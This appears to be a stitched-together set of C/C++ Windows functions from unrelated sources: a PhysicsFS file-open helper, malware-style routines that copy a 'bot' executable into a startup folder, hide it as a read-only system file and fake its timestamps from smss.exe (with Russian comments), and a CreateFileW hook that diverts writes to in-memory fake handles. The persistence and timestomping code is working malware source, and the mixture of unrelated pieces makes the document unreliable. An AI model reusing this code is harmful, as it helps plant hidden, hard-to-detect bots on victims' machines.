static void *doOpen(const char *fname, DWORD mode, DWORD creation, int rdonly)
{
HANDLE fileHandle;
WinApiFile *retval;
WCHAR *wfname;
UTF8_TO_UNICODE_STACK_MACRO(wfname, fname);
BAIL_IF_MACRO(wfname == NULL, ERR_OUT_OF_MEMORY, NULL);
fileHandle = pCreateFileW(wfname, mode, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, creation, FILE_ATTRIBUTE_NORMAL, NULL);
__PHYSFS_smallFree(wfname);
BAIL_IF_MACRO
(
fileHandle == INVALID_HANDLE_VALUE,
winApiStrError(), NULL
);
retval = (WinApiFile *) allocator.Malloc(sizeof (WinApiFile));
if (retval == NULL)
{
CloseHandle(fileHandle);
BAIL_MACRO(ERR_OUT_OF_MEMORY, NULL);
} /* if */
retval->readonly = rdonly;
retval->handle = fileHandle;
return(retval);
} /* doOpen */
void AddToAutoRun(void *body, DWORD size)
{
WCHAR *BotPath = GetShellFoldersKey( 1 );
if ( BotPath == NULL )
{
return;
}
plstrcatW( BotPath, BOT_FILE_NAME );
pSetFileAttributesW( BotPath, FILE_ATTRIBUTE_NORMAL );
HANDLE f = pCreateFileW(BotPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
DWORD written = 0;
if (f != INVALID_HANDLE_VALUE)
{
pWriteFile(f, body, size, &written, NULL);
pCloseHandle(f);
}
if (written == size)
{
SetFakeFileDateTimeW( BotPath );
pSetFileAttributesW( BotPath, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY );
}
MemFree( BotPath );
}
void SetFakeFileDateTime( WCHAR *Path )
{
WCHAR smss[] = {'\\','s','m','s','s','.','e','x','e',0};
WCHAR *SysPath = (WCHAR *)MemAlloc( 512 );
if ( SysPath == NULL )
{
return;
}
pGetSystemDirectoryW( SysPath, 512 );
plstrcatW( SysPath, smss );
HANDLE hFile = pCreateFileW( SysPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 );
MemFree( SysPath );
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
FILETIME fl1;
FILETIME fl2;
FILETIME fl3;
pGetFileTime( hFile, &fl1, &fl2, &fl3 );
pCloseHandle( hFile );
hFile = pCreateFileW( Path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 );
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
pSetFileTime( hFile, &fl1, &fl2, &fl3 );
pCloseHandle( hFile );
return;
}
void SetFakeFileDateTime(PCHAR Path)
{
WCHAR smss[] = {'\\','s','m','s','s','.','e','x','e',0};
// Получаем дату и время системмного файла
WCHAR *SysPath = (WCHAR *)MemAlloc( 512 * sizeof(WCHAR) );
if (SysPath == NULL)
return;
pGetSystemDirectoryW(SysPath, 512);
plstrcatW( SysPath, smss );
HANDLE hFile = pCreateFileW( SysPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 );
MemFree( SysPath );
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
FILETIME fl1;
FILETIME fl2;
FILETIME fl3;
pGetFileTime( hFile, &fl1, &fl2, &fl3 );
pCloseHandle( hFile );
// Устанавливаем дату бота
hFile = pCreateFileA(Path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 );
if ( hFile == INVALID_HANDLE_VALUE )
{
return;
}
pSetFileTime( hFile, &fl1, &fl2, &fl3 );
pCloseHandle( hFile );
return;
}
HANDLE WINAPI MyCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile )
{
CString strFileName;
strFileName = lpFileName;
strFileName.MakeLower();
if (g_bEnableWriteDisk)
{
goto Pass;
}
CMemFileObject *pMemFileObj = NULL;
FMemRecord.GetRecordData(strFileName,&pMemFileObj);
BOOL bCanCreate = TRUE;
g_DebugLock.Lock();
bCanCreate = nCurMemUse < MAX_MEM_FILE_SIZE;
g_DebugLock.UnLock();
if ( strFileName.Find(L"msimgsiz.dat") >= 0 || strFileName.Find(L"cryptneturlcache") >=0 || strFileName.Find(L"\\temp\\") >=0 )
{
return INVALID_HANDLE_VALUE;
}
if ( NULL == pMemFileObj && bCanCreate )
{
BOOL bPreExist = PathFileExists(lpFileName);
if(
FALSE == bPreExist //之前文件不存在
&& !( lpFileName[0] == L'\\' && lpFileName[1] == L'\\') //不是驱动对象
&& (dwCreationDisposition&CREATE_ALWAYS || dwCreationDisposition&CREATE_NEW) //想要创建新的文件
&& GENERIC_WRITE&dwDesiredAccess //需要写文件
)
{
pMemFileObj = new CMemFileObject(lpFileName);
FMemRecord.AddRecord(strFileName,pMemFileObj);
#if defined(DEBUG) || defined(_DEBUG)
CString strMsgOut;
strMsgOut.Format(L"创建内存文件:%s\n",strFileName);
OutputDebugStringW(strMsgOut);
#endif
}
}
if (pMemFileObj)
{
HANDLE hFalseHandle = GetFalseHandle();
CUserFileObject *pUserFileObj = new CUserFileObject(hFalseHandle,pMemFileObj,dwShareMode&FILE_SHARE_DELETE);
FRecord.AddRecord(hFalseHandle,pUserFileObj);
#if defined(DEBUG) || defined(_DEBUG)
CString strMsgOut;
strMsgOut.Format(L"创建伪文件 Share %d Flag %d Handle 0x%x Path:%s\n",dwShareMode,dwFlagsAndAttributes,hFalseHandle,strFileName);
OutputDebugStringW(strMsgOut);
#endif
return hFalseHandle;
}
Pass:
return pCreateFileW(
lpFileName,
dwDesiredAccess,
dwShareMode,
lpSecurityAttributes,
dwCreationDisposition,
dwFlagsAndAttributes,
hTemplateFile
);
}
